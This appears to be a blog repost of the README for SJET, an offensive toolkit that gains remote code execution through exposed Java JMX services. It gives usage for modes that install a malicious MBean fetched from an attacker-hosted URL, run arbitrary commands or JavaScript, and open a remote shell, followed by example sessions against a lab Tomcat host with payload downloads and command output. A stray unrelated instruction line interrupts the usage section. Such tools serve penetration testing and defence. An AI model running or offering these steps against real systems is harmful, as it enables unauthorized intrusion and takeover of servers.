SJET - JMX Exploitation Toolkit


Java Management Extensions (JMX) is a Java technology that supplies tools for managing and monitoring applications, system objects, devices (such as printers) and service-oriented networks. Those resources are represented by objects called MBeans (for Managed Bean). In the API, classes can be dynamically loaded and instantiated. Managing and monitoring applications can be designed and developed using the Java Dynamic Management Kit.

SJET is a JMX exploitation toolkit.

Prerequisites

Usage
SJET implements a CLI interface (using argparse):
jython sjet.py targetHost targetPort MODE (modeOptions)
Where
  • targetHost - the target IP address
  • targerPort - the target port where JMX is running
  • MODE - the script mode
  • modeOptions - the options for the mode selected

Modes and modeOptions
  • install - installs the payload in the current target.
    • payload_url - full URL to load the payload
    • payload_port - port to load the payload
  • command - runs the command CMD in the targetHost
    • CMD - the command to run
  • javascript - runs a javascript file FILENAME in the targetHost
  • shell - starts a simple shell in targetHost (with the limitations of java's Runtime.exec())
Explain how to run the automated tests for this system

Example

Installing the payload in a Windows target:
Patricios-MacBook-Pro:sjet preller$ Jython sjet.py 192.168.56.101 8008 install http://192.168.56.1 8888
[+] sjet was brought to you by siberas :)
[+] Starting webserver at port 8888
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.56.101:8008/jmxrmi
[+] Connected: rmi://192.168.56.1  1
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.56.1:8888
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
192.168.56.101 - - [11/Aug/2017 11:16:10] "GET / HTTP/1.1" 200 -
192.168.56.101 - - [11/Aug/2017 11:16:10] "GET /siberas_mlet.jar HTTP/1.1" 200 -
[+] Successfully loaded Siberas:name=payload,id=1
Patricios-MacBook-Pro:sjet preller$

Running the command 'dir' in a Windows target:
Patricios-MacBook-Pro:sjet preller$ Jython sjet.py 192.168.56.101 8008 command "dir"
[+] sjet was brought to you by siberas :)
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.56.101:8008/jmxrmi
[+] Connected: rmi://192.168.56.1  2
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing command: dir
 Volume in drive C has no label.
 Volume Serial Number is E0CE-337D

 Directory of C:\Program Files\Apache Software Foundation\Tomcat 9.0

08/11/2017  01:34 AM    <DIR>          .
08/11/2017  01:34 AM    <DIR>          ..
08/11/2017  01:34 AM                 3 ASDASD.txt
08/10/2017  07:08 AM    <DIR>          bin
08/10/2017  07:08 AM    <DIR>          conf
08/10/2017  07:08 AM    <DIR>          lib
08/02/2017  01:29 PM            58,153 LICENSE
08/11/2017  01:24 AM    <DIR>          logs
08/02/2017  01:29 PM             1,859 NOTICE
08/02/2017  01:29 PM             6,881 RELEASE-NOTES
08/11/2017  02:16 AM    <DIR>          temp
08/02/2017  01:29 PM            21,630 tomcat.ico
08/02/2017  01:29 PM            73,690 Uninstall.exe
08/10/2017  07:08 AM    <DIR>          webapps
08/10/2017  07:08 AM    <DIR>          work
08/11/2017  02:30 AM                17 _____SURELY_A_SAFE_FILE_____.exe
08/11/2017  02:29 AM                17 _____AND_DONT_CALL_ME_SHIRLEY_____.exe
               8 File(s)        162,253 bytes
               9 Dir(s)  124,198,735,872 bytes free

[+] Done
Patricios-MacBook-Pro:sjet preller$

Running the file poc.js in a Windows target:
Patricios-MacBook-Pro:sjet preller$ Jython sjet.py 192.168.56.101 8008 javascript "poc.js"
[+] sjet was brought to you by siberas :)
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.56.101:8008/jmxrmi
[+] Connected: rmi://192.168.56.1  4
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing script
None

Patricios-MacBook-Pro:sjet preller$

Running ping in shell mode in a Windows target:
Patricios-MacBook-Pro:sjet preller$ Jython sjet.py 192.168.56.101 8008 shell
[+] sjet was brought to you by siberas :)
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.56.101:8008/jmxrmi
[+] Connected: rmi://192.168.56.1  9
[+] Use command 'exit_shell' to exit the shell
>>> ping 127.0.0.1
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing command: ping 127.0.0.1

Pinging 127.0.0.1 with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128

Ping statistics for 127.0.0.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms


>>>
>>>
[4]+  Stopped                 Jython sjet.py 192.168.56.101 8008 shell
Patricios-MacBook-Pro:sjet preller$

Authors
  • Hans-Martin Münch - Initial idea and work - h0ng10
  • Patricio Reller - CLI and extra options - preller

SJET - JMX Exploitation Toolkit SJET - JMX Exploitation Toolkit Reviewed by Zion3R on 6:13 PM Rating: 5